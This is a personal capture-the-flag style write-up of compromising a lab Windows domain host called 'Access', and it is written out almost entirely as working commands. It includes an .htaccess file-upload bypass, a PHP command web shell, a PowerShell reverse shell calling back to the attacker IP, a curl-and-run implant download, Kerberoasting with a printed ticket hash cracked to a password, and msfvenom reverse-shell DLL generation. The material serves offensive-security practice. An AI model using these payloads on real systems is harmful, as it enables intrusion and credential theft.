# Access Writeup ## Enumeration ### SMB - 445 - null auth denied - guest disabled ### Access WAPP - HTTP 80 File upload: ![[Pasted image 20250402103420.png]] Files end up at: `http://192.168.188.187/uploads/` We're not initially permitted to upload `.php` files. But come to find out, we're permitted to upload `.htaccess` files: ``` POST /Ticket.php HTTP/1.1 Host: 192.168.188.187 Content-Length: 823 Cache-Control: max-age=0 Origin: http://192.168.188.187 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryb8OQl9cku4gtHTZB Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.188.187/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: keep-alive ------WebKitFormBoundaryb8OQl9cku4gtHTZB Content-Disposition: form-data; name="your-name" haxor ------WebKitFormBoundaryb8OQl9cku4gtHTZB Content-Disposition: form-data; name="your-email" haxor ------WebKitFormBoundaryb8OQl9cku4gtHTZB Content-Disposition: form-data; name="ticket-type" standard-access ------WebKitFormBoundaryb8OQl9cku4gtHTZB Content-Disposition: form-data; name="the_file"; filename=".htaccess" Content-Type: text/plain AddType application/x-httpd-php .dork ------WebKitFormBoundaryb8OQl9cku4gtHTZB Content-Disposition: form-data; name="submit" Purchase ------WebKitFormBoundaryb8OQl9cku4gtHTZB-- ``` We can now upload and execute `.dork` files as if they were `.php` files. ``` Content-Disposition: form-data; name="the_file"; filename="hax.dork" Content-Type: text/plain <?php if (isset($_GET['cmd'])) { echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>"; } ?> ``` We can now invoke `http://192.168.188.187/uploads/hax.dork?cmd=whoami` which yields `access\svc_apache`: ![[Pasted image 20250402105530.png]] Next up I'd like to attempt to upload a sliver implant and then use the abovementioned shell to invoke it. Took 25 minutes to get to this point <3. Hit a snag here with my setup. The browser I'm running is on my local machine, but my sliver client is on my remote system. So that means I'll either have to do a file transfer from my remote system to my local system and then finally to the target system. Or I shall have to improve my setup and use a solution akin to remote desktop protocols; run the browser on the remote system and then connect to the UI via my local terminal. For now I'll simply add an intermediary step which would prolly be best practice anyways, I'll leverage the simplistic `?cmd=` shell to spawn a proper remote shell: ``` GET /uploads/hax.dork?cmd=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27192.168.45.231%27%2C445%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22 HTTP/1.1 Host: 192.168.188.187 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: keep-alive ``` This yields a connection back to my `netcat` listener: ```sh ╭─[λ]-[/targets/access]-[192.168.188.187] ╰─> rlwrap nc -lnvp 445 listening on [any] 445 ... connect to [192.168.45.231] from (UNKNOWN) [192.168.188.187] 50148 whoami access\svc_apache ``` We can now go ahead and improve our access level by: 1. Instantiating a file server on my attacker system to serve up the payload: 2. Execute a simple `curl` command on the target system to download the payload Serving up the implant: ``` ╭─[λ]-[/targets/access]-[192.168.188.187] ╰─> python3 -m http.server 443 Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ... ``` And downloading it onto the remote system: ``` PS C:\xampp\htdocs\uploads> curl http://192.168.45.231:443/access.exe -o access.exe PS C:\xampp\htdocs\uploads> ls Directory: C:\xampp\htdocs\uploads Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/2/2025 1:48 AM 38 .htaccess -a---- 4/2/2025 2:16 AM 10981376 access.exe -a---- 4/2/2025 1:54 AM 100 hax.dork -a---- 4/2/2025 1:45 AM 219 haxor.asp -a---- 4/2/2025 1:41 AM 100 haxor.php.txt -a---- 4/2/2025 1:42 AM 100 haxor.php;.txt -a---- 4/2/2025 1:36 AM 6 haxor.txt -a---- 4/2/2025 1:53 AM 100 hello.dork PS C:\xampp\htdocs\uploads> .\access.exe ``` Aaaaand I'm granted a session on my sliver server: ``` [*] Session 13f539f5 access - 192.168.188.187:50180 (SERVER) - windows/amd64 - Wed, 02 Apr 2025 09:18:40 UTC sliver > ``` ## Lateral Movement - Kerberoasting `svc_mssql` At this point I realized I was missing some of my tooling due to migrating my haxor machine to a cloud based headless setup. Specifically I was missing: - Bloodhound Ingestors - Rubeus Managed to get both installed as well as generating a bloodhound collection dump and download it onto my remote system. Buuuuut, now facing the same issue, bloodhound UI is running on my local browser, whereas the bloodhound dump data is located on the remote system... Need a permanent fix for this ordeal which would definitely be a "remote browser". Could also be nice to have a NFS system on my network for general file sharing. Anyways, once I solved the issue I immediately went ahead and searched for kerberoastable users: Aaaand lo and behold we got `svc_mssql`: ![[Pasted image 20250402115049.png]] I smell DC-ADMIN here <3 I'll go ahead and execute the kerberoast using the sliver implant: ``` sliver (access) > rubeus -- kerberoast /nowrap [*] rubeus output: ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.3.2 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Target Domain : access.offsec [*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' [*] Total kerberoastable users : 1 [*] SamAccountName : svc_mssql [*] DistinguishedName : CN=MSSQL,CN=Users,DC=access,DC=offsec [*] ServicePrincipalName : MSSQLSvc/DC.access.offsec [*] PwdLastSet : 5/21/2022 5:33:45 AM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash : $krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/[email protected]*$3A06B33C4D82762371C80CE4934511EA$F9F16F2BC7AAA40E007436357EC4A685E63EEAC8C0FD25FC74B233E3E4F657BA6B32708B111F3760254AB75E85CFA912CD32C1A2A108F081329FD2BC60B27CC4D7FA05F9D3D99521156E79F50B6ED5709E1831DB32177BDDDD402D84373BD4C754CDF7E842452641C0D28CB80BC7884F5399E35F833D2BBF11E37A2EFC40400D8E78EBA3CE94DC291CBDFC6292BEA5981EE35A760DE50D0739241FA2B83D64B89BA622C5DD3270FE2249930071DE6990D3B364C50D4DF39BC6B4C1A487011B802AA75C115351EDF0B27FE179B12B01F74EAD022A4A42594D216130B136B53BB4F9E379324C980018B5763B1022C8DC6127D2A441E7CD4B0479A5ED2D42F8080EE93298CDC4C078842CCC83BA163B15785FB9CFD230736D580C45105CE75D8EA139AC319CC1429FE5C51F571B08EE290D0BE7251345BCA3FDF6F93584FA74E6D1527C5AB8328AEFD5E7713A5CA49A3606CEFD724B44F178CDC85BC6C98873FAF6A2558486E02A2C11EABAE4EAF8E76203765E391E7B6148E2D7CDB5F211E3E305920AE803E1313C112B9AAE80F7BD2D0D959CD55031AA6E0733D792D31FB0DCD481D72D4152ECB394FB659C6F2684F0900FEC85D3067A9DA1D7B922640927655B60902BBFAAC32397E886C6373561B9D7D4E53F92FB0EAB41F41CEA36D7FF7921AB5FDE5112BD04B1962A8BC1FEF725400311E64A82B8A474F8C511EC91B19D984ED8D8D1C50AEE57A264D93DFA6D763BA437852F04F363AA5767844FC3A7B012B8C3185C630A22B46103C0AFEA75BF0F53586FF85FFF05E4842CE87D2EDA1B9DA49C2B0779365EF9E49FD23EF2549E28EE9103419A0572D30E534E4F8F687BEA42CFB4C41832AB840E5B161A9767252FD3F2A8527B6877E2787B6DF0A0A5880EA17777642C801B9EEE2A6A5D4CFBC4CB01673BEAB9E4B67C4CAA62B31441865F837C5541E5A05F7CC44967EDFCB54EF5AD5399F63250751B9205EB241C4A5AA3D9DC1F5678224140B1C1C06AF8A324653064D08EA491A9F73C3B25BA4196C1181FBBBD53CC322E064EE27E08D1B2A88284314F8BBAD998EA380D9B384A3DEF889BB9792ABAF8467149039ECD051F43CE1698EC1DCB6CE44996F9681F4E0315D0BD22EB1F1694420F9EB43A812289E95622B0295AE44C9210369168B01FCD059158EE46F7263FC72E364E4E566BDAD5DCA0CD1EF20307EB04DD6B207CC70E73F12F39BD2D0B2CBA429A5F842610F51656ECEB61C5F86A875C276AF71C70BEEF1D254360CDFECEC091D2311A27A0DEA3D91B020E64CA7CA3FF7CD4E3186A167E0E17D085F2DA2826CB286A66A22B18C91B3A167DB25B41A8DB1BF97A3A92B098F88ECC3DFE58820629F8B46D3C27DBC443F5515375AF33ADFEB557CCFABE5052B3785108902D7A14F63ADE7B6734E28C72ECCC04C2E1CD0095130B5681C1E67F1DB42ED0BC08A6FA6C093406C6E0C4BEC36D3EEB1ADA472FA41C9ABF64F933258D01E4D2A7F2CAB3273231FEB2B0B70757447ED7E8C3C5E86CE070A1C654DC36571BE4678D30D6C33DF694637ABF137306A2B50AC9B0E0B2D80D92F766C601A8515A977B856C6E9DE4C7815A53C36AB3AE41EB ``` We get a noice hash, let's attempt to crack dat: ``` ╭─[λ]-[/targets/access]-[192.168.188.187] ╰─> touch svc_mssql.hash ╭─[λ]-[/targets/access]-[192.168.188.187] ╰─> vi svc_mssql.hash # copy paste the hash into the file ╭─[λ]-[/targets/access]-[192.168.188.187] ╰─> john svc_mssql.hash -w=/arsenal/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS-REP etype 23 [MD4 HMAC-MD5 RC4]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status trustno1 (?) 1g 0:00:00:00 DONE (2025-04-02 09:55) 100.0g/s 51200p/s 51200c/s 51200C/s hockey..bethany Use the "--show" option to display all of the cracked passwords reliably Session completed. ``` Seems we got a nice password: `trustno1` let's try that out: ``` ╭─[λ]-[/targets/access]-[192.168.188.187] ╰─> nxc smb $RHOST -u 'svc_mssql' -p 'trustno1' SMB 192.168.188.187 445 SERVER [*] Windows 10 / Server 2019 Build 17763 x64 (name:SERVER) (domain:access.offsec) (signing:True) (SMBv1:False) SMB 192.168.188.187 445 SERVER [+] access.offsec\svc_mssql:trustno1 ``` Okay, we're now at `01:30` for time, prolly spend half that fucking around with tooling... ## `svc_mssql` - smb - can `RW` on `SYSVOL` and other standard shares - dumped it, nothing interesting. - so apparently the `svc_mssql` user had some [[SeVolume]] priv (had to take a hint here). - but got no idea how the fuck i get the remote access for `svc_mssql`, possibly runas? - yup, took a hint there too. Need to sharpen up the practice a little ``` sliver (access) > runas --username svc_mssql --password trustno1 -p /xampp/htdocs/uploads/access.exe ``` And we get a sliver session as `svc_mssql` <3 Next we run `whoami /privs` and see that we got [[SeManageVolume]] which can be exploited to get Administrative access: ```shell msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f dll -o revshell.dll msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=443 -f dll -o revshell.dll ``` Then inside the sliver session we'll go ahead and upload it: ``` upload revshell.dll ``` ## Lessons Learned - Better tool prep - Should have trusted my instinct and used Runas - Praticed generating DLLs - Should have done my windows privesc better -